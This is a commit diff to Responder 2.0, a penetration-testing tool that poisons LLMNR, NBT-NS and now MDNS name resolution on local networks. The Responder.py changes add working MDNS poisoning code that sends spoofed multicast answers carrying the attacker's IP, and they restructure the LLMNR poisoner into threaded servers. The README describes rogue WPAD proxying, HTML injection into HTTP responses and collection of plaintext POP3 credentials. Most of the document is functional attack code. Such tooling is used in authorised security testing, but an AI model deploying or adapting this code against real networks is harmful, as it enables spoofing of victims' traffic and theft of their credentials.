Added: In-scope IP handling for MDNS

merged with latest version

CHANGELOG

@@ -1,4 +1,5 @@
 ChangeLog Responder 2.0:
+- Added: MDNS Poisoner.
 - Added: -F command line switch to force NTLM authentication on PAC file retrieval.
 - Added: Ability to inject custom HTML in HTTP responses.
 - Added: New WPAD proxy server. Enabled by default.

README.md

@@ -5,7 +5,7 @@ http://www.spiderlabs.com
 INTRODUCTION
 ============
 
-This tool is first an LLMNR and NBT-NS responder, it will answer to 
+This tool is first an LLMNR, NBT-NS and MDNS responder, it will answer to 
 *specific* NBT-NS (NetBIOS Name Service) queries based on their name 
 suffix (see: http://support.microsoft.com/kb/163409). By default, the
 tool will only answers to File Server Service request, which is for SMB.
@@ -86,6 +86,8 @@ FEATURES
 
 - WPAD rogue transparent proxy server. This module will capture all HTTP requests from anyone launching Internet Explorer on the network. This module is higly effective. You can now send your custom Pac script to a victim and inject HTML into the server's responses. See Responder.conf. This module is now enabled by default.
 
+- Analyze mode: This module allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning any requests. Also, you can map domains, MSSQL servers, workstations passively, see if ICMP Redirects attacks are plausible on your subnet. 
+
 - Responder is now using a configuration file. See Responder.conf.
 
 - Built-in POP3 auth server. This module will collect POP3 plaintext credentials
@@ -120,7 +122,7 @@ Running this tool:
 
 Usage Example:
 
-python Responder.py -i 10.20.30.40 -r On -I eth0
+python Responder.py -i 10.20.30.40 -r On -F On -w On
 
 Options List:
 
@@ -145,7 +147,7 @@ Options List:
                                      host that issued an NBT-NS or LLMNR query.
 
 -w On, --wpad=On                     Set this to On or Off to start/stop the WPAD rogue
-                                     proxy server. Default value is On
+                                     proxy server. Default value is Off
 
 --lm=Off                             Set this to On if you want to force LM hashing
                                      downgrade for Windows XP/2003 and earlier. Default value is Off
@@ -154,6 +156,12 @@ Options List:
                                      wpad.dat file retrieval. This might cause a login prompt in
                                      some specific cases. Default value is Off
 
+-A, --analyze                        Analyze mode. This option allows you to see NBT-NS,BROWSER, 
+                                     LLMNR requests from which workstation to which workstation 
+                                     without poisoning any requests. Also, you can map domains, 
+                                     MSSQL servers, workstations passively.
+
+
 -v                                   More verbose
 
 
@@ -162,6 +170,7 @@ For more information read these posts:
 http://blog.spiderlabs.com/2012/10/introducing-responder-10.html
 http://blog.spiderlabs.com/2013/01/owning-windows-networks-with-responder-17.html
 http://blog.spiderlabs.com/2013/02/owning-windows-network-with-responder-part-2.html
+http://blog.spiderlabs.com/2014/02/responder-20-owning-windows-networks-part-3.html
 
 Follow our latest updates on twitter:
 https://twitter.com/PythonResponder

Responder.py

@@ -134,7 +134,7 @@ logger2.addHandler(logging.FileHandler(Log2Filename,'w'))
 
 AnalyzeFilename = str(os.path.join(ResponderPATH,"Analyze-LLMNR-NBT-NS.log"))
 logger3 = logging.getLogger('Analyze LLMNR/NBT-NS')
-logger3.addHandler(logging.FileHandler(AnalyzeFilename,'w'))
+logger3.addHandler(logging.FileHandler(AnalyzeFilename,'a'))
 
 def Show_Help(ExtraHelpData):
    help = "NBT Name Service/LLMNR Responder 2.0.\nPlease send bugs/comments to: lgaffie@trustwave.com\nTo kill this script hit CRTL-C\n\n"
@@ -197,10 +197,10 @@ Challenge = ""
 for i in range(0,len(NumChal),2):
     Challenge += NumChal[i:i+2].decode("hex")
 
-Show_Help("[+]NBT-NS & LLMNR responder started\n[+]Loading Responder.conf File..\nGlobal Parameters set:\nResponder is bound to this interface:%s\nChallenge set is:%s\nWPAD Proxy Server is:%s\nWPAD script loaded:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nIMAP Server is:%s\nPOP3 Server is:%s\nSMTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\nServing Executable via HTTP&WPAD is:%s\nAlways Serving a Specific File via HTTP&WPAD is:%s\n\n"%(BIND_TO_Interface, NumChal,WPAD_On_Off,WPAD_Script,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,IMAP_On_Off,POP_On_Off,SMTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off))
+Show_Help("[+]NBT-NS, LLMNR & MDNS responder started\n[+]Loading Responder.conf File..\nGlobal Parameters set:\nResponder is bound to this interface:%s\nChallenge set is:%s\nWPAD Proxy Server is:%s\nWPAD script loaded:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nIMAP Server is:%s\nPOP3 Server is:%s\nSMTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\nServing Executable via HTTP&WPAD is:%s\nAlways Serving a Specific File via HTTP&WPAD is:%s\n\n"%(BIND_TO_Interface, NumChal,WPAD_On_Off,WPAD_Script,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,IMAP_On_Off,POP_On_Off,SMTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off))
 
 if AnalyzeMode:
-   print '[+]Responder is in analyze mode. No NBT-NS/LLMNR requests will be poisoned.\n'
+   print '[+]Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.\n'
 
 #Packet class handling all packet generation (see odict.py).
 class Packet():
@@ -444,7 +444,7 @@ def RAPThisDomain(Client,Domain):
                  l.append('   -'+x)
           WKST = RapFinger(Client,Domain,"\xff\xff\xff\xff")
           if WKST is not None:
-             l.append('[!]Workstation Server detected on Domain %s:'%(Domain))
+             l.append('[!]Workstations/Servers detected on Domain %s:'%(Domain))
              for x in WKST:
                  l.append('   -'+x)
           else:
@@ -484,7 +484,7 @@ def RapFinger(Host,Domain, Type):
              buffer1 = longueur(packet1)+packet1  
              s.send(buffer1)
              data = s.recv(1024)
-             ##Rap ServerEnum, domain forests and PDC
+             ##Rap ServerEnum.
              if data[8:10] == "\x75\x00":
                 head = SMBHeader(cmd="\x25",flag1="\x08", flag2="\x01\xc8",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x04\x00")
                 t = SMBTransRAPData(Data=RAPNetServerEnum3Data(ServerType=Type,DetailLevel="\x01\x00",TargetDomain=Domain))
@@ -492,8 +492,8 @@ def RapFinger(Host,Domain, Type):
                 packet1 = str(head)+str(t)
                 buffer1 = longueur(packet1)+packet1  
                 s.send(buffer1)
-                data = s.recv(1024)
-                ##Rap ServerEnum, SQL servers
+                data = s.recv(64736)
+                ##Rap ServerEnum, Get answer and return what we're looking for.
                 if data[8:10] == "\x25\x00":
                    s.close()
                    return ParsePacket(data)
@@ -858,8 +858,8 @@ class SMB1LM(BaseRequestHandler):
                  data = self.request.recv(1024)
 
         except Exception:
-           pass #no need to print errors..
            self.request.close()
+           pass #no need to print errors..
 
 ##################################################################################
 #SQL Stuff
@@ -1008,7 +1008,7 @@ class LLMNRAns(Packet):
         self.fields["AnswerNameLen"] = struct.pack(">h",len(self.fields["AnswerName"]))[1]
         self.fields["QuestionNameLen"] = struct.pack(">h",len(self.fields["QuestionName"]))[1]
 
-def Parse_LLMNR_Name(data,addr):
+def Parse_LLMNR_Name(data):
    NameLen = struct.unpack('>B',data[12])[0]
    Name = data[13:13+NameLen]
    return Name
@@ -1057,107 +1057,84 @@ def AnalyzeICMPRedirect():
 
 AnalyzeICMPRedirect()
 
-def RunLLMNR():
-   try:
-      ALL = '0.0.0.0'
-      MADDR = "224.0.0.252"
-      MPORT = 5355
-      if IsOsX():
-          print "OsX Bind to interface is not supported..Listening on all interfaces."
-      if OsInterfaceIsSupported(INTERFACE):
-         try:
-            IP = FindLocalIP(BIND_TO_Interface)
-            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
-            s.setsockopt(socket.SOL_SOCKET, 25, BIND_TO_Interface+'\0')
-            s.bind((ALL,MPORT))
-            s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
-            s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
-            Join = s.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,inet_aton(MADDR)+inet_aton(IP))
-         except:
-            print "Non existant network interface provided in Responder.conf, please provide a valid interface."
-            sys.exit(1)
+# LLMNR Server class.
+class LLMNR(BaseRequestHandler):
 
-      else:
-         s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
-         s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
-         s.bind((ALL,MPORT))
-         s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
-         Join = s.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,inet_aton(MADDR)+inet_aton(ALL))
-   except:
-      raise
-   while True:
-       try:
-          data, addr = s.recvfrom(1024)
-          if Analyze(AnalyzeMode):
-             if data[2:4] == "\x00\x00":
-                if Parse_IPV6_Addr(data):
-                    Name = Parse_LLMNR_Name(data,addr)
-                    if Is_Finger_On(Finger_On_Off):
-                       try:
-                          Finger = RunSmbFinger((addr[0],445))
-                          Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s.\nOs Version is: %s Client Version is: %s"%(addr[0], Name,Finger[0],Finger[1])
-                          logger3.warning(Message)
-                       except Exception:
-                          Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(addr[0], Name)
-                          logger3.warning(Message)
-                       if PrintLLMNRNBTNS(AnalyzeFilename,Message):
-                          print Message
-                    else:
-                       Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(addr[0], Name)
-                       if PrintLLMNRNBTNS(AnalyzeFilename,Message):
-                          print Message
-                       logger3.warning(Message)
-
-          if RespondToSpecificHost(RespondTo):
-             if Analyze(AnalyzeMode) == False:
-                if RespondToIPScope(RespondTo, addr[0]):
-                   if data[2:4] == "\x00\x00":
-                      if Parse_IPV6_Addr(data):
-                         Name = Parse_LLMNR_Name(data,addr)
-                         buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
-                         buff.calculate()
-                         for x in range(1):
-                            s.sendto(str(buff), addr)
-                         Message =  "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(addr[0],Name)
-                         logging.warning(Message)
-                         if PrintLLMNRNBTNS(Log2Filename,Message):
-                            print Message
-                            logger2.warning(Message)
-                         if Is_Finger_On(Finger_On_Off):
-                            try:
-                               Finger = RunSmbFinger((addr[0],445))
-                               print '[+] OsVersion is:%s'%(Finger[0])
-                               print '[+] ClientVersion is :%s'%(Finger[1])
-                               logging.warning('[+] OsVersion is:%s'%(Finger[0]))
-                               logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
-                            except Exception:
-                               logging.warning('[+] Fingerprint failed for host: %s'%(addr[0]))
-                               pass
-          else:
-             if data[2:4] == "\x00\x00":
-                if Analyze(AnalyzeMode) == False:
-                   if Parse_IPV6_Addr(data):
-                      Name = Parse_LLMNR_Name(data,addr)
-                      buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
-                      buff.calculate()
-                      Message =  "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(addr[0],Name)
-                      for x in range(1):
-                         s.sendto(str(buff), addr)
-                      if PrintLLMNRNBTNS(Log2Filename,Message):
-                         print Message
-                         logger2.warning(Message)
+    def handle(self):
+        data, soc = self.request
+        try:
+            if Analyze(AnalyzeMode):
+               if data[2:4] == "\x00\x00":
+                  if Parse_IPV6_Addr(data):
+                      Name = Parse_LLMNR_Name(data)
                       if Is_Finger_On(Finger_On_Off):
                          try:
-                            Finger = RunSmbFinger((addr[0],445))
-                            print '[+] OsVersion is:%s'%(Finger[0])
-                            print '[+] ClientVersion is :%s'%(Finger[1])
-                            logging.warning('[+] OsVersion is:%s'%(Finger[0]))
-                            logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
+                            Finger = RunSmbFinger((self.client_address[0],445))
+                            Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s.\nOs Version is: %s Client Version is: %s"%(self.client_address[0], Name,Finger[0],Finger[1])
+                            logger3.warning(Message)
                          except Exception:
-                            logging.warning('[+] Fingerprint failed for host: %s'%(addr[0]))
-                            pass
-       except:
-          raise
+                            Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(self.client_address[0], Name)
+                            logger3.warning(Message)
+                         if PrintLLMNRNBTNS(AnalyzeFilename,Message):
+                            print Message
+                      else:
+                         Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(self.client_address[0], Name)
+                         if PrintLLMNRNBTNS(AnalyzeFilename,Message):
+                            print Message
+                         logger3.warning(Message)
+
+            if RespondToSpecificHost(RespondTo):
+               if Analyze(AnalyzeMode) == False:
+                  if RespondToIPScope(RespondTo, self.client_address[0]):
+                     if data[2:4] == "\x00\x00":
+                        if Parse_IPV6_Addr(data):
+                           Name = Parse_LLMNR_Name(data)
+                           buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
+                           buff.calculate()
+                           for x in range(1):
+                              soc.sendto(str(buff), self.client_address)
+                           Message =  "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(self.client_address[0],Name)
+                           logging.warning(Message)
+                           if PrintLLMNRNBTNS(Log2Filename,Message):
+                              print Message
+                              logger2.warning(Message)
+                           if Is_Finger_On(Finger_On_Off):
+                              try:
+                                 Finger = RunSmbFinger((self.client_address[0],445))
+                                 print '[+] OsVersion is:%s'%(Finger[0])
+                                 print '[+] ClientVersion is :%s'%(Finger[1])
+                                 logging.warning('[+] OsVersion is:%s'%(Finger[0]))
+                                 logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
+                              except Exception:
+                                 logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
+                                 pass
+
+            if Analyze(AnalyzeMode) == False and RespondToSpecificHost(RespondTo) == False:
+               if data[2:4] == "\x00\x00":
+                     if Parse_IPV6_Addr(data):
+                        Name = Parse_LLMNR_Name(data)
+                        buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
+                        buff.calculate()
+                        Message =  "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(self.client_address[0],Name)
+                        for x in range(1):
+                           soc.sendto(str(buff), self.client_address)
+                        if PrintLLMNRNBTNS(Log2Filename,Message):
+                           print Message
+                           logger2.warning(Message)
+                        if Is_Finger_On(Finger_On_Off):
+                           try:
+                              Finger = RunSmbFinger((self.client_address[0],445))
+                              print '[+] OsVersion is:%s'%(Finger[0])
+                              print '[+] ClientVersion is :%s'%(Finger[1])
+                              logging.warning('[+] OsVersion is:%s'%(Finger[0]))
+                              logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
+                           except Exception:
+                              logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
+                              pass
+            else:
+               pass
+        except:
+           pass
 
 ##################################################################################
 #DNS Stuff
@@ -1200,8 +1177,7 @@ class DNSAns(Packet):
 class DNS(BaseRequestHandler):
 
     def handle(self):
-        req, soc = self.request
-        data = req
+        data, soc = self.request
         if self.client_address[0] == "127.0.0.1":
            pass
         elif ParseDNSType(data):
@@ -1228,6 +1204,82 @@ class DNSTCP(BaseRequestHandler):
         except Exception:
            pass
 
+
+##################################################################################
+#MDNS Stuff
+##################################################################################
+class MDNSAns(Packet):
+    fields = OrderedDict([
+        ("Tid",              "\x00\x00"),
+        ("Flags",            "\x84\x00"),
+        ("Question",         "\x00\x00"),
+        ("AnswerRRS",        "\x00\x01"),
+        ("AuthorityRRS",     "\x00\x00"),
+        ("AdditionalRRS",    "\x00\x00"),   
+        ("AnswerName",       ""),
+        ("AnswerNameNull",   "\x00"),    
+        ("Type",             "\x00\x01"),  
+        ("Class",            "\x00\x01"),
+        ("TTL",              "\x00\x00\x00\x78"),##Poison for 2mn.
+        ("IPLen",            "\x00\x04"),
+        ("IP",               "\x00\x00\x00\x00"),
+    ])
+
+    def calculate(self):
+        self.fields["IP"] = inet_aton(OURIP)
+        self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"]))
+
+def Parse_MDNS_Name(data):
+   data = data[12:]
+   NameLen = struct.unpack('>B',data[0])[0]
+   Name = data[1:1+NameLen]
+   NameLen_ = struct.unpack('>B',data[1+NameLen])[0]
+   Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
+   return Name+'.'+Name_
+
+def Poisoned_MDNS_Name(data):
+   data = data[12:]
+   Name = data[:len(data)-5]
+   return Name
+
+class MDNS(BaseRequestHandler):
+
+    def handle(self):
+       MADDR = "224.0.0.251"
+       MPORT = 5353
+       data, soc = self.request
+       if self.client_address[0] == "127.0.0.1":
+          pass
+       try:
+         if Analyze(AnalyzeMode):
+            if Parse_IPV6_Addr(data):
+               print '[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data))
+               logging.warning('[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data)))
+
+         if RespondToSpecificHost(RespondTo):
+            if Analyze(AnalyzeMode) == False:
+               if RespondToIPScope(RespondTo, self.client_address[0]):
+                  if Parse_IPV6_Addr(data):
+                     print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))
+                     logging.warning('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)))
+                     Name = Poisoned_MDNS_Name(data)
+                     MDns = MDNSAns(AnswerName = Name)
+                     MDns.calculate()
+                     soc.sendto(str(MDns),(MADDR,MPORT))
+
+         if Analyze(AnalyzeMode) == False and RespondToSpecificHost(RespondTo) == False:
+            if Parse_IPV6_Addr(data):
+               print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))
+               logging.warning('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)))
+               Name = Poisoned_MDNS_Name(data)
+               MDns = MDNSAns(AnswerName = Name)
+               MDns.calculate()
+               soc.sendto(str(MDns),(MADDR,MPORT))
+         else:
+            pass
+       except Exception:
+         raise
+
 ##################################################################################
 #HTTP Stuff
 ##################################################################################
@@ -1498,7 +1550,7 @@ def InjectData(data):
              return Gzip
           else:
              return data
-       if "Content-Type: text/html" in Headers:
+       if "content-type: text/html" in Headers.lower():
           Len = ''.join(re.findall('(?<=Content-Length: )[^\r\n]*', Headers))
           HasHTML = re.findall('(?<=<html)[^<]*', Content)
           if HasHTML :
@@ -2103,30 +2155,89 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer):
               pass
         TCPServer.server_bind(self)
 
+class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
+    
+    def server_bind(self):
+       MADDR = "224.0.0.251"
+       self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
+       self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
+       Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,inet_aton(MADDR)+inet_aton(OURIP))
+       if OsInterfaceIsSupported(INTERFACE):
+          try:
+             self.socket.setsockopt(socket.SOL_SOCKET, 25, BIND_TO_Interface+'\0')
+          except:
+             pass
+       UDPServer.server_bind(self)
+
+class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
+    
+    def server_bind(self):
+       MADDR = "224.0.0.252"
+       self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
+       self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
+       Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,inet_aton(MADDR)+inet_aton(OURIP))
+       if OsInterfaceIsSupported(INTERFACE):
+          try:
+             self.socket.setsockopt(socket.SOL_SOCKET, 25, BIND_TO_Interface+'\0')
+          except:
+             pass
+       UDPServer.server_bind(self)
+
 ThreadingUDPServer.allow_reuse_address = 1
+ThreadingUDPMDNSServer.allow_reuse_address = 1
+ThreadingUDPLLMNRServer.allow_reuse_address = 1
 ThreadingTCPServer.allow_reuse_address = 1
 
 
 def serve_thread_udp(host, port, handler):
-	try:
-		server = ThreadingUDPServer((host, port), handler)
-		server.serve_forever()
-	except:
-		print "Error starting UDP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root), no other servers are running and the correct network interface is set in Responder.conf."
- 
+   try:
+      if OsInterfaceIsSupported(INTERFACE):
+         IP = FindLocalIP(BIND_TO_Interface)
+         server = ThreadingUDPServer((IP, port), handler)
+         server.serve_forever()
+      else:
+         server = ThreadingUDPServer((host, port), handler)
+         server.serve_forever()
+   except:
+      print "Error starting UDP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root), no other servers are running and the correct network interface is set in Responder.conf."
+
+def serve_thread_udp_MDNS(host, port, handler):
+   try:
+      server = ThreadingUDPMDNSServer((host, port), handler)
+      server.serve_forever()
+   except:
+      print "Error starting UDP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root), no other servers are running and the correct network interface is set in Responder.conf."
+
+def serve_thread_udp_LLMNR(host, port, handler):
+   try:
+      server = ThreadingUDPLLMNRServer((host, port), handler)
+      server.serve_forever()
+   except:
+      print "Error starting UDP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root), no other servers are running and the correct network interface is set in Responder.conf."
+
 def serve_thread_tcp(host, port, handler):
-	try:
-		server = ThreadingTCPServer((host, port), handler)
-		server.serve_forever()
-	except:
-		print "Error starting TCP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root), no other servers are running and the correct network interface is set in Responder.conf."
+   try:
+      if OsInterfaceIsSupported(INTERFACE):
+         IP = FindLocalIP(BIND_TO_Interface)
+         server = ThreadingTCPServer((IP, port), handler)
+         server.serve_forever()
+      else:
+         server = ThreadingTCPServer((host, port), handler)
+         server.serve_forever()
+   except:
+      print "Error starting TCP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root), no other servers are running and the correct network interface is set in Responder.conf."
 
 def serve_thread_SSL(host, port, handler):
-	try:
-		server = SSlSock((host, port), handler)
-		server.serve_forever()
-	except:
-		print "Error starting TCP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root), no other servers are running and the correct network interface is set in Responder.conf."
+   try:
+      if OsInterfaceIsSupported(INTERFACE):
+         IP = FindLocalIP(BIND_TO_Interface)
+         server = SSlSock((IP, port), handler)
+         server.serve_forever()
+      else:
+         server = SSlSock((host, port), handler)
+         server.serve_forever()
+   except:
+      print "Error starting TCP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root), no other servers are running and the correct network interface is set in Responder.conf."
 
 def main():
     try:
@@ -2144,8 +2255,9 @@ def main():
       #Browser listener loaded by default
       thread.start_new(serve_thread_udp,('', 138,Browser))
       ## Poisoner loaded by default, it's the purpose of this tool...
-      thread.start_new(serve_thread_udp,('', 137,NB))
-      thread.start_new(RunLLMNR())
+      thread.start_new(serve_thread_udp_MDNS,('', 5353,MDNS))   #MDNS
+      thread.start_new(serve_thread_udp,('', 137,NB))           #NBNS
+      thread.start_new(serve_thread_udp_LLMNR,('', 5355, LLMNR)) #LLMNR
     except KeyboardInterrupt:
         exit()
 
@@ -2159,3 +2271,5 @@ if __name__ == '__main__':
 
 
 
+
+